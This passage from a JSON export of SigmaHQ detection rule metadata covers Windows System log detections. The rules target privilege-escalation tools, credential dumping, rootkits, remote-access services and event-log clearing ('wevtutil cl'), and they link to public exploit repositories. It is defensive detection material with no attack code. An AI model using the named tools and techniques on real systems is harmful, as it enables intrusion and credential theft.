"win_system_invoke_obfuscation_via_var_services.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", - "uuid": "e6f81941-b1cd-4766-87db-9fc156f658ee", - "value": "KDC RC4-HMAC Downgrade CVE-2022-37966", - "meta": { - "refs": [ - "https://support.microsoft.com/en-us/topic/kb5021131-how-to-manage-the-kerberos-protocol-changes-related-to-cve-2022-37966-fd837ac3-cdec-4e76-a6ec-86e67501407d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_kdcsvc_rc4_downgrade.yml" - ], - "tags": [ - "attack.privilege_escalation" - ], - "creation_date": "2022/11/09", - "filename": "win_system_kdcsvc_rc4_downgrade.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", - "uuid": "e97d9903-53b2-41fc-8cb9-889ed4093e80", - "value": "KrbRelayUp Service Installation", - "meta": { - "refs": [ - "https://github.com/Dec0ne/KrbRelayUp", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_krbrelayup_service_installation.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543" - ], - "creation_date": "2022/05/11", - "filename": "win_system_krbrelayup_service_installation.yml", - "author": "Sittikorn S, Tim Shelton", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", - "uuid": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", - "value": "Local Privilege Escalation Indicator TabTip", - "meta": { - "refs": [ - "https://github.com/antonioCoco/JuicyPotatoNG", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_lpe_indicators_tabtip.yml" - ], - "tags": [ - "attack.execution", - "attack.t1557.001" - ], - "creation_date": "2022/10/07", - "filename": "win_system_lpe_indicators_tabtip.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the reporting of NTLMv1 being used between a client and server", - "uuid": "e9d4ab66-a532-4ef7-a502-66a9e4a34f5d", - "value": "NTLMv1 Logon Between Client and Server", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1550/002/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_lsasrv_ntlmv1.yml" - ], - "tags": [ - "attack.execution", - "attack.t1550.002", - "attack.s0363" - ], - "creation_date": "2022/04/26", - "filename": "win_system_lsasrv_ntlmv1.yml", - "author": "Tim Shelton", - "level": "low", - "falsepositive": [ - "Environments that use NTLMv1" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects well-known credential dumping tools execution via service execution events", - "uuid": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", - "value": "Credential Dumping Tools Service Execution - System", - "meta": { - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_mal_creddumper.yml" - ], - "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" - ], - "creation_date": "2017/03/05", - "filename": "win_system_mal_creddumper.yml", - "author": "Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", - "level": "high", - "falsepositive": [ - "Legitimate Administrator using credential dumping tool for password recovery" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "uuid": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", - "value": "Meterpreter or Cobalt Strike Getsystem Service Installation - System", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", - "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" - ], - "creation_date": "2019/10/26", - "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", - "level": "critical", - "falsepositive": [ - "Highly unlikely" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", - "uuid": "25b9c01c-350d-4b95-bed1-836d04a4f324", - "value": "Moriya Rootkit - System", - "meta": { - "refs": [ - "https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_moriya_rootkit.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" - ], - "creation_date": "2021/05/06", - "filename": "win_system_moriya_rootkit.yml", - "author": "Bhabesh Raj", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", - "uuid": "f14719ce-d3ab-4e25-9ce6-2899092260b0", - "value": "NTFS Vulnerability Exploitation", - "meta": { - "refs": [ - "https://twitter.com/jonasLyk/status/1347900440000811010", - "https://twitter.com/wdormann/status/1347958161609809921", - "https://www.bleepingcomputer.com/news/security/windows-10-bug-corrupts-your-hard-drive-on-seeing-this-files-icon/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_ntfs_vuln_exploit.yml" - ], - "tags": [ - "attack.impact", - "attack.t1499.001" - ], - "creation_date": "2021/01/11", - "filename": "win_system_ntfs_vuln_exploit.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Windows Pcap driver installation based on a list of associated .sys files.", - "uuid": "7b687634-ab20-11ea-bb37-0242ac130002", - "value": "Windows Pcap Drivers", - "meta": { - "refs": [ - "https://ragged-lab.blogspot.com/2020/06/capturing-pcap-driver-installations.html#more", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_pcap_drivers.yml" - ], - "tags": [ - "attack.discovery", - "attack.credential_access", - "attack.t1040" - ], - "creation_date": "2020/06/10", - "filename": "win_system_pcap_drivers.yml", - "author": "Cian Heasley", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", - "uuid": "18f37338-b9bd-4117-a039-280c81f7a596", - "value": "Zerologon Exploitation Using Well-known Tools", - "meta": { - "refs": [ - "https://www.secura.com/blog/zero-logon", - "https://bi-zone.medium.com/hunting-for-zerologon-f65c61586382", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" - ], - "tags": [ - "attack.t1210", - "attack.lateral_movement" - ], - "creation_date": "2020/10/13", - "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml", - "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", - "level": "critical", - "falsepositive": "No established falsepositives", - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects powershell script installed as a Service", - "uuid": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", - "value": "PowerShell Scripts Installed as Services", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_powershell_script_installed_as_service.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002" - ], - "creation_date": "2020/10/06", - "filename": "win_system_powershell_script_installed_as_service.yml", - "author": "oscd.community, Natalia Shornikova", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects QuarksPwDump clearing access history in hive", - "uuid": "39f919f3-980b-4e6f-a975-8af7e507ef2b", - "value": "QuarksPwDump Clearing Access History", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_quarkspwdump_clearing_hive_access_history.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002" - ], - "creation_date": "2017/05/15", - "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious services", - "uuid": "66bfef30-22a5-4fcd-ad44-8d81e60922ae", - "value": "Rare Service Installations", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_rare_service_installs.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" - ], - "creation_date": "2017/03/08", - "filename": "win_system_rare_service_installs.yml", - "author": "Florian Roth", - "level": "low", - "falsepositive": [ - "Software installation", - "Software updates" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detect suspicious error on protocol RDP, potential CVE-2019-0708", - "uuid": "aaa5b30d-f418-420b-83a0-299cb6024885", - "value": "Potential RDP Exploit CVE-2019-0708", - "meta": { - "refs": [ - "https://github.com/zerosum0x0/CVE-2019-0708", - "https://github.com/Ekultek/BlueKeep", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_rdp_potential_cve_2019_0708.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" - ], - "creation_date": "2019/05/24", - "filename": "win_system_rdp_potential_cve_2019_0708.yml", - "author": "Lionel PRAT, Christophe BROCAS, @atc_project (improvements)", - "level": "medium", - "falsepositive": [ - "Bad connections or network interruptions" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the installation of the anydesk software service. Which could be an indication of anydesk abuse if you the software isn't already used.", - "uuid": "530a6faa-ff3d-4022-b315-50828e77eef5", - "value": "Anydesk Remote Access Software Service Installation", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_anydesk.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/08/11", - "filename": "win_system_service_install_anydesk.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate usage of the anydesk tool" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects PsExec service installation and execution events (service and Sysmon)", - "uuid": "d26ce60c-2151-403c-9a42-49420d87b5e4", - "value": "Hacktool Service Registration or Execution", - "meta": { - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_hacktools.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" - ], - "creation_date": "2022/03/21", - "filename": "win_system_service_install_hacktools.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers", - "uuid": "e0d1ad53-c7eb-48ec-a87a-72393cc6cedc", - "value": "Mesh Agent Service Installation", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_mesh_agent.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "creation_date": "2022/11/28", - "filename": "win_system_service_install_mesh_agent.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate use of the tool" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects NetSupport Manager service installation on the target system.", - "uuid": "2d510d8d-912b-45c5-b1df-36faa3d8c3f4", - "value": "NetSupport Manager Service Install", - "meta": { - "refs": [ - "http://resources.netsupportsoftware.com/resources/manualpdfs/nsm_manual_uk.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_netsupport_manager.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/10/31", - "filename": "win_system_service_install_netsupport_manager.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate use of the tool" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects PAExec service installation", - "uuid": "de7ce410-b3fb-4e8a-b38c-3b999e2c3420", - "value": "PAExec Service Installation", - "meta": { - "refs": [ - "https://www.poweradmin.com/paexec/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_paexec.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002" - ], - "creation_date": "2022/10/26", - "filename": "win_system_service_install_paexec.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines.\nPDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines\n", - "uuid": "ee9ca27c-9bd7-4cee-9b01-6e906be7cae3", - "value": "New PDQDeploy Service - Server Side", - "meta": { - "refs": [ - "https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_pdqdeploy.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" - ], - "creation_date": "2022/07/22", - "filename": "win_system_service_install_pdqdeploy.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate use of the tool" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects PDQDeploy service installation on the target system.\nWhen a package is deployed via PDQDeploy it installs a remote service on the target machine with the name \"PDQDeployRunner-X\" where \"X\" is an integer starting from 1\n", - "uuid": "b98a10af-1e1e-44a7-bab2-4cc026917648", - "value": "New PDQDeploy Service - Client Side", - "meta": { - "refs": [ - "https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_pdqdeploy_runner.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" - ], - "creation_date": "2022/07/22", - "filename": "win_system_service_install_pdqdeploy_runner.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate use of the tool" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects PsExec service installation and execution events (service and Sysmon)", - "uuid": "42c575ea-e41e-41f1-b248-8093c3e82a28", - "value": "PsExec Service Installation", - "meta": { - "refs": [ - "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", - "https://jpcertcc.github.io/ToolAnalysisResultSheet", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_psexec.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" - ], - "creation_date": "2017/06/12", - "filename": "win_system_service_install_psexec.yml", - "author": "Thomas Patzke", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Remote Utilities Host service installation on the target system.", - "uuid": "85cce894-dd8b-4427-a958-5cc47a4dc9b9", - "value": "Remote Utilities Host Service Install", - "meta": { - "refs": [ - "https://www.remoteutilities.com/support/kb/host-service-won-t-start/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_remote_utilities.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/10/31", - "filename": "win_system_service_install_remote_utilities.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate use of the tool" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", - "uuid": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", - "value": "Sliver C2 Default Service Installation", - "meta": { - "refs": [ - "https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/client/command/commands.go#L1231", - "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_sliver.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" - ], - "creation_date": "2022/08/25", - "filename": "win_system_service_install_sliver.yml", - "author": "Florian Roth, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects a service installation that uses a suspicious double ampersand used in the image path value", - "uuid": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", - "value": "New Service Uses Double Ampersand in Path", - "meta": { - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_susp_double_ampersand.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027" - ], - "creation_date": "2022/07/05", - "filename": "win_system_service_install_susp_double_ampersand.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool.", - "uuid": "4bb79b62-ef12-4861-981d-2aab43fab642", - "value": "TacticalRMM Service Installation", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_tacticalrmm.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "creation_date": "2022/11/28", - "filename": "win_system_service_install_tacticalrmm.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate use of the tool" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", - "uuid": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", - "value": "DHCP Server Loaded the CallOut DLL", - "meta": { - "refs": [ - "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", - "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", - "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_dhcp_config.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ], - "creation_date": "2017/05/15", - "filename": "win_system_susp_dhcp_config.yml", - "author": "Dimitrios Slamaris", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", - "uuid": "75edd3fd-7146-48e5-9848-3013d7f0282c", - "value": "DHCP Server Error Failed Loading the CallOut DLL", - "meta": { - "refs": [ - "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", - "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", - "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_dhcp_config_failed.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ], - "creation_date": "2017/05/15", - "filename": "win_system_susp_dhcp_config_failed.yml", - "author": "Dimitrios Slamaris, @atc_project (fix)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "One of the Windows Core Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", - "uuid": "100ef69e-3327-481c-8e5c-6d80d9507556", - "value": "System Eventlog Cleared", - "meta": { - "refs": [ - "https://twitter.com/deviouspolack/status/832535435960209408", - "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_eventlog_cleared.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" - ], - "creation_date": "2022/05/17", - "filename": "win_system_susp_eventlog_cleared.yml", - "author": "Florian Roth, Tim Shelton", - "level": "high", - "falsepositive": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", - "uuid": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", - "value": "ProcessHacker Privilege Elevation", - "meta": { - "refs": [ - "https://twitter.com/1kwpeter/status/1397816101455765504", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_proceshacker.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" - ], - "creation_date": "2021/05/27", - "filename": "win_system_susp_proceshacker.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", - "uuid": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", - "value": "RTCore Suspicious Service Installation", - "meta": { - "refs": [ - "https://github.com/br-sn/CheekyBlinder/blob/e1764a8a0e7cda8a3716aefa35799f560686e01c/CheekyBlinder/CheekyBlinder.cpp", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_rtcore64_service_install.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/08/30", - "filename": "win_system_susp_rtcore64_service_install.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious SAM dump activity as cause by QuarksPwDump and other password dumpers", - "uuid": "839dd1e8-eda8-4834-8145-01beeee33acd", - "value": "SAM Dump to AppData", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_sam_dump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002" - ], - "creation_date": "2018/01/27", - "filename": "win_system_susp_sam_dump.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious service installation commands", - "uuid": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", - "value": "Suspicious Service Installation", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" - ], - "creation_date": "2022/03/18", - "filename": "win_system_susp_service_installation.yml", - "author": "pH-T", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects service installation in suspicious folder appdata", - "uuid": "5e993621-67d4-488a-b9ae-b420d08b96cb", - "value": "Service Installation in Suspicious Folder", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation_folder.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" - ], - "creation_date": "2022/03/18", - "filename": "win_system_susp_service_installation_folder.yml", - "author": "pH-T", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects service installation with suspicious folder patterns", - "uuid": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", - "value": "Service Installation with Suspicious Folder Pattern", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation_folder_pattern.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" - ], - "creation_date": "2022/03/18", - "filename": "win_system_susp_service_installation_folder_pattern.yml", - "author": "pH-T", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious service installation scripts", - "uuid": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", - "value": "Suspicious Service Installation Script", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation_script.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" - ], - "creation_date": "2022/03/18", - "filename": "win_system_susp_service_installation_script.yml", - "author": "pH-T", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Windows Update get some error Check if need a 0-days KB", - "uuid": "13cfeb75-9e33-4d04-b0f7-ab8faaa95a59", - "value": "Windows Update Error", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_system_update_error.yml" - ], - "tags": [ - "attack.impact", - "attack.resource_development", - "attack.t1584" - ], - "creation_date": "2021/12/04", - "filename": "win_system_susp_system_update_error.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "During exploitation of this vuln, two logs (providername:Microsoft-Windows-User Profiles Service) with eventid 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation.Viewed on 2008 Server", - "uuid": "52a85084-6989-40c3-8f32-091e12e17692", - "value": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919", - "meta": { - "refs": [ - "https://packetstormsecurity.com/files/166692/Windows-User-Profile-Service-Privlege-Escalation.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/08/16", - "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml", - "author": "Cybex", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "uuid": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", - "value": "Service Installed By Unusual Client - System", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_system_service_installation_by_unusal_client.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543" - ], - "creation_date": "2022/09/15", - "filename": "win_system_system_service_installation_by_unusal_client.yml", - "author": "Tim Rauch", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "system", - "logsource.product": "windows" - } - }, - { - "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", - "uuid": "8e4cf0e5-aa5d-4dc3-beff-dc26917744a9", - "value": "Tap Driver Installation", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_tap_driver_installation.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048" - ], - "creation_date": "2019/10/24", - "filename": "win_system_tap_driver_installation.yml", - "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate OpenVPN TAP insntallation" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects volume shadow copy mount via windows event log", - "uuid": "f512acbf-e662-4903-843e-97ce4652b740", - "value": "Volume Shadow Copy Mount", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy", - 